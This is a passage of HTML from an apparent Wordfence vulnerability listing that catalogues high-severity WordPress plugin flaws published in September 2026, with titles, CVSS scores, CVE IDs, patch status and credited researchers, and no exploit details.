<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c3001ec4-a1d8-43d7-8e0c-1fe2e4e7f314" target="_blank" rel="noopener">Eventin &lt;= 4.1.22 &#8211; Authenticated (Contirbutor+) Local File Inclusion via &#8216;event_layout&#8217; Parameter</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15667" target="_blank" rel="noopener noreferrer">							CVE-2026-15667						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 8, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-event-solution" target="_blank" rel="noopener">Eventin – Event Calendar, Tickets, Registration, Booking &amp; WooCommerce</a> <span class="wfvr-software-slug">[wp-event-solution]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c3001ec4-a1d8-43d7-8e0c-1fe2e4e7f314" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a50b8e5c-d7f2-45d9-ba24-ea7a3d807deb" target="_blank" rel="noopener">Eventin &lt;= 4.1.22 &#8211; Authenticated (Custom+) Local File Inclusion via &#8216;event_layout&#8217; Parameter</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15406" target="_blank" rel="noopener noreferrer">							CVE-2026-15406						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 8, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-event-solution" target="_blank" rel="noopener">Eventin – Event Calendar, Tickets, Registration, Booking &amp; WooCommerce</a> <span class="wfvr-software-slug">[wp-event-solution]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a50b8e5c-d7f2-45d9-ba24-ea7a3d807deb" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/562712a8-a42e-4b36-9985-3c71698efdda" target="_blank" rel="noopener">GEO my WP &lt;= 4.5.5.3 &#8211; Unauthenticated Local File Inclusion</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-85200" target="_blank" rel="noopener noreferrer">							CVE-2026-85200						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 11, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/geo-my-wp" target="_blank" rel="noopener">GEO my WP</a> <span class="wfvr-software-slug">[geo-my-wp]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yck" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b879437258152fc3023ac0a0d84bf29e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b879437258152fc3023ac0a0d84bf29e"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yck" target="_blank" rel="noopener">yck</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/562712a8-a42e-4b36-9985-3c71698efdda" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d57816cb-1e73-4097-ae1d-7ae2879a4c5c" target="_blank" rel="noopener">Masteriyo LMS &lt;= 3.4.0 &#8211; Authenticated (Subscriber+) PHP Object Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-82845" target="_blank" rel="noopener noreferrer">							CVE-2026-82845						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 10, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learning-management-system" target="_blank" rel="noopener">Masteriyo LMS – LMS Course Builder, Quizzes &amp; Certificates</a> <span class="wfvr-software-slug">[learning-management-system]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/karthik-ramakrishnan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b83998e318a17b004dfe1f66689a2125.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b83998e318a17b004dfe1f66689a2125"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/karthik-ramakrishnan" target="_blank" rel="noopener">Karthik Ramakrishnan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d57816cb-1e73-4097-ae1d-7ae2879a4c5c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/026ba3a0-5ad4-4506-88f2-a101a4f5e19e" target="_blank" rel="noopener">Music Store – WordPress eCommerce &lt; 1.4.5 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-82304" target="_blank" rel="noopener noreferrer">							CVE-2026-82304						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 7, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/music-store" target="_blank" rel="noopener">Music Store – WordPress eCommerce</a> <span class="wfvr-software-slug">[music-store]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nobody-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/3418ad4ee805983c98090703f44c49d2.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3418ad4ee805983c98090703f44c49d2"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nobody-2" target="_blank" rel="noopener">nobody</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/026ba3a0-5ad4-4506-88f2-a101a4f5e19e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3dd798cd-72a7-4761-8879-9c9a7a233d0a" target="_blank" rel="noopener">Quentn WP 1.2.13 &#8211; 1.2.14 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-84068" target="_blank" rel="noopener noreferrer">							CVE-2026-84068						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 10, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/quentn-wp" target="_blank" rel="noopener">Quentn WP</a> <span class="wfvr-software-slug">[quentn-wp]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yaswanth-reddy-sunkara" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/04dc25fcada9520afe8fb170e539d8b9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="04dc25fcada9520afe8fb170e539d8b9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yaswanth-reddy-sunkara" target="_blank" rel="noopener">Yaswanth Reddy Sunkara</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3dd798cd-72a7-4761-8879-9c9a7a233d0a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/53d9b351-ba17-431a-b371-7dc1a87bd757" target="_blank" rel="noopener">rtMedia for WordPress, BuddyPress and bbPress &lt;= 4.7.11 &#8211; Unauthenticated SQL Injection via &#8216;compare&#8217; Parameter</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16482" target="_blank" rel="noopener noreferrer">							CVE-2026-16482						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 11, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/buddypress-media" target="_blank" rel="noopener">rtMedia for WordPress, BuddyPress and bbPress</a> <span class="wfvr-software-slug">[buddypress-media]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/53d9b351-ba17-431a-b371-7dc1a87bd757" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/35a49ba9-02a6-47cf-98f0-053b06036b08" target="_blank" rel="noopener">Sticky Chat Widget &lt;= 1.4.2 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15462" target="_blank" rel="noopener noreferrer">							CVE-2026-15462						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 10, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sticky-chat-widget" target="_blank" rel="noopener">Sticky Chat Widget – Floating Chat Icons, Contact Form, Call, Click to Chat, Email &amp; Message Buttons</a> <span class="wfvr-software-slug">[sticky-chat-widget]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/whitefalcon" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/6a1e4196aabd8945a4c15841a6a23df4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6a1e4196aabd8945a4c15841a6a23df4"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/whitefalcon" target="_blank" rel="noopener">WhiteFalcon</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/35a49ba9-02a6-47cf-98f0-053b06036b08" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/969d605d-e093-447c-abf7-0d56cb3ac569" target="_blank" rel="noopener">Unlimited Elements For Elementor &lt;= 2.0.16 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18561" target="_blank" rel="noopener noreferrer">							CVE-2026-18561						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 10, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/unlimited-elements-for-elementor" target="_blank" rel="noopener">Unlimited Elements For Elementor</a> <span class="wfvr-software-slug">[unlimited-elements-for-elementor]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yuto-hyakumoto" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/0f962dd7143eb1e6e46c9632a10cf4cf.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="0f962dd7143eb1e6e46c9632a10cf4cf"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yuto-hyakumoto" target="_blank" rel="noopener">Yuto Hyakumoto</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/969d605d-e093-447c-abf7-0d56cb3ac569" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/37f9c8b4-0307-45f4-a1cb-417c7a922997" target="_blank" rel="noopener">Verified Reviews (Avis Vérifiés) &lt;= 2.4.6 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81800" target="_blank" rel="noopener noreferrer">							CVE-2026-81800						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 9, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/netreviews" target="_blank" rel="noopener">Verified Reviews (Avis Vérifiés)</a> <span class="wfvr-software-slug">[netreviews]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mael-martin" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7275b0fce42b2214965214f9122521b2.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7275b0fce42b2214965214f9122521b2"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mael-martin" target="_blank" rel="noopener">Mael MARTIN</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/othmane-el-ayadi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c2fee5a91266c9a327e04055ee576412.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c2fee5a91266c9a327e04055ee576412"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/othmane-el-ayadi" target="_blank" rel="noopener">Othmane EL AYADI</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/37f9c8b4-0307-45f4-a1cb-417c7a922997" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/22652d78-577c-4467-9b6e-55811ebf6412" target="_blank" rel="noopener">WooCommerce &lt; 11.1.0 &#8211; Unauthenticated Denial of Service</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-48888" target="_blank" rel="noopener noreferrer">							CVE-2026-48888						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 7, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce" target="_blank" rel="noopener">WooCommerce</a> <span class="wfvr-software-slug">[woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/22652d78-577c-4467-9b6e-55811ebf6412" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b352994f-13f9-4139-94a9-0abdb52125a9" target="_blank" rel="noopener">WP Fusion (Pro) &lt;= 3.47.13 &#8211; Authenticated (Subscriber+) Privilege Escalation via ThriveCart Auto Login &#8216;role&#8217; Parameter</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14444" target="_blank" rel="noopener noreferrer">							CVE-2026-14444						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 7, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-fusion" target="_blank" rel="noopener">WP Fusion (Pro)</a> <span class="wfvr-software-slug">[wp-fusion]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jarno-vos" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7e44c1d5ad8f406fc10e62f0a5b11655.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7e44c1d5ad8f406fc10e62f0a5b11655"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jarno-vos" target="_blank" rel="noopener">Jarno Vos (jarnovos)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b352994f-13f9-4139-94a9-0abdb52125a9" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4d1974af-9fdd-485d-a424-a7e56892f257" target="_blank" rel="noopener">CatalogX – Catalog Mode, Enquiry &amp; Quotes for WooCommerce &lt;= 6.1.4 &#8211; Unauthenticated Privilege Escalation</a></h4>
<div class="cvss-score-badge">7.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.3 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81792" target="_blank" rel="noopener noreferrer">							CVE-2026-81792						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 7, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-catalog-enquiry" target="_blank" rel="noopener">CatalogX – Catalog Mode, Enquiry &amp; Quotes for WooCommerce</a> <span class="wfvr-software-slug">[woocommerce-catalog-enquiry]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/peng-zhou" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/peng-zhou" target="_blank" rel="noopener">Peng Zhou</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4d1974af-9fdd-485d-a424-a7e56892f257" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d82f5ffb-3499-462b-a04e-37e33ddf05c9" target="_blank" rel="noopener">miniOrange 2FA – Two Factor Authentication for WordPress 5.3.24 &#8211; 6.3.0 &#8211; Missing Authorization to Unauthenticated Arbitrary Option Deletion</a></h4>
<div class="cvss-score-badge">7.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.3 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-77770" target="_blank" rel="noopener noreferrer">							CVE-2026-77770						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 8, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/miniorange-2-factor-authentication" target="_blank" rel="noopener">miniOrange 2FA – Two Factor Authentication for WordPress (OTP, SMS, Email, Google Authenticator)</a> <span class="wfvr-software-slug">[miniorange-2-factor-authentication]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
